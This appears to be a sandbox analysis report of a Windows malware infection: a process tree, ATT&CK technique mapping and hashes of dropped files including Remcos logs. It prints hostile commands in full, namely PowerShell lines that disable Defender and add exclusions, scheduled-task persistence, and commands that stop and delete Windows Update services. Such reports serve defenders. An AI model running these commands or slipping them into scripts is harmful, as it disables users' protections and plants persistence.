- C:\Users\Admin\AppData\Local\Temp\a\tmglobalzx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\tmglobalzx.exe"
  2⤵
  PID:5932
- - C:\Users\Admin\AppData\Local\Temp\a\tmglobalzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\tmglobalzx.exe"
    3⤵
    PID:6660
- - C:\Users\Admin\AppData\Local\Temp\a\tmglobalzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\tmglobalzx.exe"
    3⤵
    PID:5164
- C:\Users\Admin\AppData\Local\Temp\a\donpyzx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\donpyzx.exe"
  2⤵
  PID:5180
- - C:\Users\Admin\AppData\Local\Temp\a\donpyzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\donpyzx.exe"
    3⤵
    PID:3196
- C:\Users\Admin\AppData\Local\Temp\a\kakazx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\kakazx.exe"
  2⤵
  PID:7644
- - C:\Users\Admin\AppData\Local\Temp\a\kakazx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\kakazx.exe"
    3⤵
    PID:1808
- - C:\Users\Admin\AppData\Local\Temp\a\kakazx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\kakazx.exe"
    3⤵
    PID:5396
- C:\Users\Admin\AppData\Local\Temp\a\work.exe
  "C:\Users\Admin\AppData\Local\Temp\a\work.exe"
  2⤵
  PID:8176
- C:\Users\Admin\AppData\Local\Temp\a\updater.exe
  "C:\Users\Admin\AppData\Local\Temp\a\updater.exe"
  2⤵
  PID:4412
- - C:\Windows\SysWOW64\wscript.exe
    "C:\Windows\System32\wscript.exe" vai.vbe
    3⤵
    PID:4760
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c ipconfig /release
      4⤵
      PID:4312
    - - C:\Windows\SysWOW64\ipconfig.exe
        
        ipconfig /release
        5⤵
        Gathers network information
        
        PID:5156
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c lbvcefvmm.pif pvanphvj.exe
      4⤵
      PID:7744
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\lbvcefvmm.pif
        
        lbvcefvmm.pif pvanphvj.exe
        5⤵
        
        PID:5680
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c ipconfig /renew
      4⤵
      PID:7540
    - - C:\Windows\SysWOW64\ipconfig.exe
        
        ipconfig /renew
        5⤵
        Gathers network information
        
        PID:4688
- C:\Users\Admin\AppData\Local\Temp\a\1232.exe
  "C:\Users\Admin\AppData\Local\Temp\a\1232.exe"
  2⤵
  PID:6040
- - C:\Users\Admin\AppData\Local\Temp\a\1232.exe
    "C:\Users\Admin\AppData\Local\Temp\a\1232.exe"
    3⤵
    PID:5996
- C:\Users\Admin\AppData\Local\Temp\a\obizx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\obizx.exe"
  2⤵
  PID:7188
- - C:\Users\Admin\AppData\Local\Temp\a\obizx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\obizx.exe"
    3⤵
    PID:7076
- - C:\Users\Admin\AppData\Local\Temp\a\obizx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\obizx.exe"
    3⤵
    PID:3908
- C:\Users\Admin\AppData\Local\Temp\a\plugmanzx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\plugmanzx.exe"
  2⤵
  PID:6524
- - C:\Users\Admin\AppData\Local\Temp\a\plugmanzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\plugmanzx.exe"
    3⤵
    PID:6876
- C:\Users\Admin\AppData\Local\Temp\a\grammyzx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\grammyzx.exe"
  2⤵
  PID:3336
- - C:\Users\Admin\AppData\Local\Temp\a\grammyzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\grammyzx.exe"
    3⤵
    PID:7956
- C:\Users\Admin\AppData\Local\Temp\a\build9.exe
  "C:\Users\Admin\AppData\Local\Temp\a\build9.exe"
  2⤵
  PID:4956
- C:\Users\Admin\AppData\Local\Temp\a\petercodyzx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\petercodyzx.exe"
  2⤵
  PID:5948
- - C:\Users\Admin\AppData\Local\Temp\a\petercodyzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\petercodyzx.exe"
    3⤵
    PID:4372
- - C:\Users\Admin\AppData\Local\Temp\a\petercodyzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\petercodyzx.exe"
    3⤵
    PID:6888
- - C:\Users\Admin\AppData\Local\Temp\a\petercodyzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\petercodyzx.exe"
    3⤵
    PID:6908
- C:\Users\Admin\AppData\Local\Temp\a\clp5.exe
  "C:\Users\Admin\AppData\Local\Temp\a\clp5.exe"
  2⤵
  PID:6796
- C:\Users\Admin\AppData\Local\Temp\a\k2.exe
  "C:\Users\Admin\AppData\Local\Temp\a\k2.exe"
  2⤵
  PID:6852
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "k2" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\EsetSecurity\k2.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\a\k2.exe" &&START "" "C:\Users\Admin\AppData\Local\EsetSecurity\k2.exe"
    3⤵
    PID:4768
- C:\Users\Admin\AppData\Local\Temp\a\hussanzx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\hussanzx.exe"
  2⤵
  PID:6688
- C:\Users\Admin\AppData\Local\Temp\a\smithempirezx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\smithempirezx.exe"
  2⤵
  PID:2720
- C:\Users\Admin\AppData\Local\Temp\a\fred.exe
  "C:\Users\Admin\AppData\Local\Temp\a\fred.exe"
  2⤵
  PID:6540
- C:\Users\Admin\AppData\Local\Temp\a\oyozx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\oyozx.exe"
  2⤵
  PID:3380
- C:\Users\Admin\AppData\Local\Temp\a\3eef203fb515bda85f514e168abb5973.exe
  "C:\Users\Admin\AppData\Local\Temp\a\3eef203fb515bda85f514e168abb5973.exe"
  2⤵
  PID:6576
- C:\Users\Admin\AppData\Local\Temp\a\kds7uq5kknv.exe
  "C:\Users\Admin\AppData\Local\Temp\a\kds7uq5kknv.exe"
  2⤵
  PID:6296
- C:\Users\Admin\AppData\Local\Temp\a\full_min_cr.exe
  "C:\Users\Admin\AppData\Local\Temp\a\full_min_cr.exe"
  2⤵
  PID:5384

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v7408000.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v7408000.exe
1⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2596
- C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a5675133.exe
  C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a5675133.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:3208
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
    3⤵
    PID:228
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3208 -s 148
    3⤵
    - Program crash
    PID:1988
- C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\b8163594.exe
  C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\b8163594.exe
  2⤵
  PID:220

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1020

C:\Users\Admin\AppData\Local\Temp\a9e2a16078\lamod.exe
C:\Users\Admin\AppData\Local\Temp\a9e2a16078\lamod.exe
1⤵
PID:4700

C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\y6346726.exe
C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\y6346726.exe
1⤵
PID:1432
- C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\y2172325.exe
  C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\y2172325.exe
  2⤵
  PID:1824
- - C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\j2814313.exe
    C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\j2814313.exe
    3⤵
    PID:2908
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
      "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
      4⤵
      PID:4456
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2908 -s 200
      4⤵
      Program crash
      PID:3916
- - C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\k3458754.exe
    C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\k3458754.exe
    3⤵
    PID:5448
- C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\l5517101.exe
  C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\l5517101.exe
  2⤵
  PID:5624

C:\Windows\System32\GameBarPresenceWriter.exe
"C:\Windows\System32\GameBarPresenceWriter.exe" -ServerName:Windows.Gaming.GameBar.Internal.PresenceWriterServer
1⤵
PID:4624

C:\Windows\System32\GamePanel.exe
"C:\Windows\System32\GamePanel.exe" 00000000000902E0 /startuptips
1⤵
PID:4808

C:\Windows\System32\bcastdvr.exe
"C:\Windows\System32\bcastdvr.exe" -ServerName:Windows.Media.Capture.Internal.BroadcastDVRServer
1⤵
PID:4860

C:\Users\Admin\AppData\Local\Temp\a9e2a16078\lamod.exe
C:\Users\Admin\AppData\Local\Temp\a9e2a16078\lamod.exe
1⤵
PID:5304

C:\Users\Admin\AppData\Local\Temp\a9e2a16078\lamod.exe
C:\Users\Admin\AppData\Local\Temp\a9e2a16078\lamod.exe
1⤵
PID:4276

C:\Windows\system32\certreq.exe
"C:\Windows\system32\certreq.exe"
1⤵
PID:5240

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:6268

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:6260

C:\Users\Admin\AppData\Local\Temp\a9e2a16078\lamod.exe
C:\Users\Admin\AppData\Local\Temp\a9e2a16078\lamod.exe
1⤵
PID:6084

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
1⤵
PID:5892

C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
1⤵
PID:7628

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
1⤵
- Enumerates processes with tasklist
PID:7600

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
1⤵
PID:7336

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:6812

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }
1⤵
PID:8120

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:8112
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-ac 0
  2⤵
  PID:3732
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-dc 0
  2⤵
  PID:7124
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-ac 0
  2⤵
  PID:6900
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-dc 0
  2⤵
  PID:6176

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
1⤵
PID:8028
- C:\Windows\System32\sc.exe
  sc stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:5204
- C:\Windows\System32\sc.exe
  sc stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:6320
- C:\Windows\System32\sc.exe
  sc stop wuauserv
  2⤵
  - Launches sc.exe
  PID:7748
- C:\Windows\System32\sc.exe
  sc stop bits
  2⤵
  - Launches sc.exe
  PID:7456
- C:\Windows\System32\sc.exe
  sc stop dosvc
  2⤵
  - Launches sc.exe
  PID:8048
- C:\Windows\System32\reg.exe
  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
  2⤵
  PID:7080
- C:\Windows\System32\reg.exe
  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
  2⤵
  PID:944
- C:\Windows\System32\reg.exe
  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
  2⤵
  PID:5236
- C:\Windows\System32\reg.exe
  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
  2⤵
  PID:5660
- C:\Windows\System32\reg.exe
  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  PID:5432

C:\Windows\system32\certreq.exe
"C:\Windows\system32\certreq.exe"
1⤵
PID:6940

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc
1⤵
PID:7992

C:\Users\Admin\AppData\Roaming\Microsoft\config\MicrosoftEdgeUpdateTaskMachineUARun.exe
C:\Users\Admin\AppData\Roaming\Microsoft\config\MicrosoftEdgeUpdateTaskMachineUARun.exe
1⤵
PID:6544

C:\Users\Admin\AppData\Local\Temp\a9e2a16078\lamod.exe
C:\Users\Admin\AppData\Local\Temp\a9e2a16078\lamod.exe
1⤵
PID:7916

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }
1⤵
PID:6132
- C:\Windows\system32\schtasks.exe
  "C:\Windows\system32\schtasks.exe" /run /tn NoteUpdateTaskMachineQC
  2⤵
  PID:6024

C:\Users\Admin\AppData\Local\Microsoft\ZBZ.exe
"C:\Users\Admin\AppData\Local\Microsoft\ZBZ.exe"
1⤵
PID:4180
- C:\Users\Admin\AppData\Local\Microsoft\ZBZ.exe
  C:\Users\Admin\AppData\Local\Microsoft\ZBZ.exe
  2⤵
  PID:7612
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "ZBZ.exe"
    3⤵
    PID:1880

C:\Users\Admin\AppData\Local\Microsoft\Q]LjGTHF.exe
"C:\Users\Admin\AppData\Local\Microsoft\Q]LjGTHF.exe"
1⤵
PID:5660
- C:\Users\Admin\AppData\Local\Microsoft\Q]LjGTHF.exe
  C:\Users\Admin\AppData\Local\Microsoft\Q]LjGTHF.exe
  2⤵
  PID:5652

C:\Users\Admin\AppData\Local\Temp\a9e2a16078\lamod.exe
C:\Users\Admin\AppData\Local\Temp\a9e2a16078\lamod.exe
1⤵
PID:6176

C:\ProgramData\Timeupper\HVPIO.exe
C:\ProgramData\Timeupper\HVPIO.exe
1⤵
PID:4396

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
1⤵
PID:5788

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0 /state0:0xa3ae3855 /state1:0x41c64e6d
1⤵
PID:7128

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
1⤵
PID:7008

C:\Users\Admin\AppData\Local\Temp\a9e2a16078\lamod.exe
C:\Users\Admin\AppData\Local\Temp\a9e2a16078\lamod.exe
1⤵
PID:5332

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Web Service

T1102

Credential Access

Discovery

Process Discovery

T1057

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleUpdateSetup.exe

Filesize
1.3MB

MD5
ebf39794ba6132055e6114d47bc18941

SHA1
214dead1bd716c58709c39a8180551b737048785

SHA256
8af777d0f92cef2d9040a634527c3753669235589c23129f09855ad0ebe10c6f

SHA512
01e7521af569050acc473fd13c8dd9a781370bd7cefcbc7e953e66ab930f407e9791c9fdb2ab4f368579f16bebb7368bebd2a475351a42d9e2092da0835bffbb

Download Submit
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

Filesize
152KB

MD5
e4bf1e4d8477fbf8411e274f95a0d528

SHA1
a3ff668cbc56d22fb3b258fabff26bac74a27e21

SHA256
62f622b022d4d8a52baf02bcf0c163f6fd046265cc4553d2a8b267f8eded4b76

SHA512
429d99fc7578d07c02b69e6daf7d020cff9baa0098fbd15f05539cb3b78c3ac4a368dee500c4d14b804d383767a7d5e8154e61d4ab002d610abed4d647e14c70

Download Submit
C:\Program Files (x86)\Microsoft Krptvw\Mxqekzr.exe

Filesize
15.1MB

MD5
651549239e1b3bba64442f92d890db6d

SHA1
55a8d0c1469e943ef454666ff442c7f21cf235b0

SHA256
5f760b7e1de614a5b1eb8f8b92b53f5cf94c8ac6b9db8db71c544c79d151cd91

SHA512
256b9913ef58dd5246b71fa941ccaf3741e839d01afe85ad4a6172314ee297f9c5da3a3107df3cedc9edbf05de807e5322d3490997cbce5219d56e71c0e744ad

Download Submit
C:\ProgramData\Rfmcos\rfmcos.exe

Filesize
478KB

MD5
9aa44989b63c667ede9f25e26497c20f

SHA1
28d3d9c5e486abf89ba305ca371271ceef9af55b

SHA256
202577211d7d1710869244007ccb21c8fdf3140c3445481ca6e839da82fef962

SHA512
0e3669cf074a7abb63fb7a0c85dd0024f0e1b11773c99e8d54c005003a668e65562390423508dbd2398c410b7997443e7e91cc51142cdbab850ea7c94f1275e3

Download Submit
C:\ProgramData\Rfmcos\rfmcos.exe

Filesize
478KB

MD5
9aa44989b63c667ede9f25e26497c20f

SHA1
28d3d9c5e486abf89ba305ca371271ceef9af55b

SHA256
202577211d7d1710869244007ccb21c8fdf3140c3445481ca6e839da82fef962

SHA512
0e3669cf074a7abb63fb7a0c85dd0024f0e1b11773c99e8d54c005003a668e65562390423508dbd2398c410b7997443e7e91cc51142cdbab850ea7c94f1275e3

Download Submit
C:\ProgramData\Rfmcos\rfmcos.exe

Filesize
478KB

MD5
9aa44989b63c667ede9f25e26497c20f

SHA1
28d3d9c5e486abf89ba305ca371271ceef9af55b

SHA256
202577211d7d1710869244007ccb21c8fdf3140c3445481ca6e839da82fef962

SHA512
0e3669cf074a7abb63fb7a0c85dd0024f0e1b11773c99e8d54c005003a668e65562390423508dbd2398c410b7997443e7e91cc51142cdbab850ea7c94f1275e3

Download Submit
C:\ProgramData\Timeupper\HVPIO.exe

Filesize
417.4MB

MD5
ef48569b4b3cc574c0ad67f4cdc9ce95

SHA1
537481754821f6077bf37e97ac0b3412bef71960

SHA256
26e052792503650192870c75296d7897f479bd0da3bed4149be802561b6ce9bc

SHA512
18625ce58c6d32ac39f43f1475ac2615908af7a2cafdfb675d5e05780f1ad5db82f981a3f9b916b5199096bbfe7feb0a9976f69edb9df063911255cc05cc7f75

Download Submit
C:\ProgramData\Timeupper\HVPIO.exe

Filesize
401.2MB

MD5
6e26164bde5b64c7eab3b2661ae2a89d

SHA1
dcf4a2cba4212846a08a21891ceb092e6071d2cf

SHA256
db4166b0cfb3645e4482f3d7b592999a6566f06d61c12e07113f6804dd9e3db4

SHA512
6933f87665461193a83c85793d5c2525cd155d32720191077329844082ca795d03ba70fd02324a45d0efa27134eb80cb07b6e1edbbd5de9698d02086489eb331

Download Submit
C:\ProgramData\Timeupper\HVPIO.exe

Filesize
381.1MB

MD5
8c6db638200e39ef07357847fa2b3dc1

SHA1
075dc5eb26ddc7379c3238fd5b72f4d201e329ff

SHA256
f9d092b96d0b05e168d2944192f0515e8490883df74875825d104009d57141ec

SHA512
fac95a0ab41c8295e91e8e27e3ce01841f1dbcde1b7589e0a11fc961a0b2e785ffa8d27bd7275511be2e13c4d248760e9cd32700522b46e543074685157ac5a9

Download Submit
C:\ProgramData\h5gb4fg\g3f31sd.exe

Filesize
3.9MB

MD5
4d6ee8f47bd9b907baf7994ccae80279

SHA1
dbf248a1211b421317567cadba2821fb08a73487

SHA256
71c4b45fe8c7871d9e4e4a5e6da6e724b797489cbe88580312646f078ba18a8a

SHA512
8d2c7d1d655af5d31b163d948872d5e138a1b435d677550c981a378b92f73947a9aebc49ae9222e2efcc64280ba0bb5cdb17db66192a1d21e1025297e01cf542

Download Submit
C:\ProgramData\remcos\logs.dat

Filesize
214B

MD5
90a277d2321bde240e040cf69980adc5

SHA1
63214b8c35978f621b3fc146be9a6037b2585103

SHA256
f84d9f41aa225b9891dcf054c5d6d792e844053cfbcc66b2b3a03c8679b9662c

SHA512
ea7d4ec19de004a48a5983f37e335ff0c8ffd674d0118d8fb67ca954ab1eb0d728cd56490535eb3eeb2212035333e50c9fb08d806b9cc42f5f33db5d80bb110a

Download Submit
C:\ProgramData\remcos\logs.dat

Filesize
434B

MD5
bf1c7e548f268022479e6ce090f05bdf

SHA1
94fca32a2a93ee900f1dcf00936d4a2a3aae0f14

SHA256
70c9b0a93f594f8c2478f75e465c2cc61b2a218e60479bca3fdba9f41225482c

SHA512
2c88efd7afd3fa9ff14bd9e632c91aad8bdd0f76d07444a118ce9ebadc7559bd366d482ec3bcb880971fd04b8cc13c71671665c6f7f3aec254b704c673ca887f

Download Submit
C:\ProgramData\remcos\logs.dat

Filesize
1KB

MD5
46d019ea4d529412ac4556ec6f99bae7

SHA1
df99d903d47e60dec8184d1a8014bfb60195daaf

SHA256
19fffa66e5f3f0a94e8904e3822f24a19637d3b06c0a49850b751e81180f7ebb

SHA512
96cd4825415bfe6dfe3e0c5cdb4fc9236574236b44481ec59c5d93b276b0e734e4c99bfe84af8e211217c8a820e2c23204705c01d4ef0c84feed5bb6af0d948b

Download Submit
C:\ProgramData\remcos\logs.dat

Filesize
1KB

MD5
45e9a84f497267932a5374e3bb135634

SHA1
8b26414344184624c1340239c66c95ad0ac4c83f

SHA256
1bc1990c0ea249c5cbf3b2bacee91cd40c15bbc56542f753dcf1d0c27c1e0669

SHA512
5639f4bec4c70be5d19cbd0e9c0d2fb49958b21a72ba0470484130024662439b6ba80f15fb42072118446c9746a43bf4bd4e2c7c682fdce08b4039cbe46b0862

Download Submit
C:\Users\Admin\AppData\Local\EsetSecurity\k2.exe

Filesize
599KB

MD5
fdb8081ac26d8de3f7582b2616bcf3e8

SHA1
c46856c1394a0b36f7826285db0d72ae494f15f0

SHA256
2c2d57d1ea08595db9a8a6c1bf8dbe40fac57a9b784eff00c4095c72fce80e98

SHA512
0fdaa8f7c6ce93026fa1ad2e18b0ad31cd0e77afc17763042e841b039a2a1130b4138f34a2d32d8e74bee347f26b40f36d224be8b7f4cd7c2f6917617ff60c98

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\H.exe.log

Filesize
226B

MD5
d78293ab15ad25b5d6e8740fe5fd3872

SHA1
51b70837f90f2bff910daee706e6be8d62a3550e

SHA256
4d64746f8d24ec321b1a6c3a743946b66d8317cbc6bac6fed675a4bf6fa181f3

SHA512
1127435ef462f52677e1ef4d3b8cfdf9f5d95c832b4c9f41526b7448d315f25d96d3d5454108569b76d66d78d07ea5ba4a1ba8baee108e8c1b452ba19cc04925

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\YY.exe.log

Filesize
226B

MD5
d78293ab15ad25b5d6e8740fe5fd3872

SHA1
51b70837f90f2bff910daee706e6be8d62a3550e

SHA256
4d64746f8d24ec321b1a6c3a743946b66d8317cbc6bac6fed675a4bf6fa181f3

SHA512
1127435ef462f52677e1ef4d3b8cfdf9f5d95c832b4c9f41526b7448d315f25d96d3d5454108569b76d66d78d07ea5ba4a1ba8baee108e8c1b452ba19cc04925

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
ad5cd538ca58cb28ede39c108acb5785

SHA1
1ae910026f3dbe90ed025e9e96ead2b5399be877

SHA256
c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033

SHA512
c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AppLaunch.exe.log

Filesize
226B

MD5
957779c42144282d8cd83192b8fbc7cf

SHA1
de83d08d2cca06b9ff3d1ef239d6b60b705d25fe

SHA256
0d7ca7ba65e2b465e4878e324ceab8f8981f5ec06dcf5bc32559a4467a9c7d51

SHA512
f1549c61b4f2906d13b2aabb74772c2bc826cd42373d7bb6c48cbb125d5aa2ec17617e6b5e67e8aae3bb5790cc831cdba48a45008ed01df4fba8be448cce39fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\donpyzx.exe.log

Filesize
1KB

MD5
0c2899d7c6746f42d5bbe088c777f94c

SHA1
622f66c5f7a3c91b28a9f43ce7c6cabadbf514f1

SHA256
5b0b99740cadaeff7b9891136644b396941547e20cc7eea646560d0dad5a5458

SHA512
ab7a3409ed4b6ca00358330a3aa4ef6de7d81eb21a5e24bb629ef6a7c7c4e2a70ca3accfbc989ed6e495fdb8eb6203a26d6f2a37b2a5809af4276af375b49078

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
45KB

MD5
473e37a9478645438faa392130962165

SHA1
1945d60b3c42328b13b03b7a9e21827caf5ddd34

SHA256
9b1fabf828efdc67d36672c671575388916c07d8a0f2b15ec2c5cf0f637a25b5

SHA512
d182f024e00ad48d20f258859aef7f56c2e3ac8cb6743c0bbb86f4e224cf21bf85c8d04d8dabb64ef6f8e6d1f4110352ccce8482313b2c4e20f473be29b9fdd0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6737d37659ab235e9f26d9aaa65db09f

SHA1
4f5931ba7b3bf5b38a381bf5dac385184d6e72a1

SHA256
ea943e9cfdf0d0d6f5b8ad4b650721a3b744db9bcc230c7929fcb6f3b8b14d4c

SHA512
c88c5f2c7d0f451a2673d0b0bd5bf4d09db3176000e77be1e7769ad829e5486a4528872605e4d1c4d8c20a7a5ae607afde06e2e01aed07f6198f5822dc1c7dae

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000004001\toolspub2.exe

Filesize
205KB

MD5
3a66a27b79651f7c45a136a08a44a571

SHA1
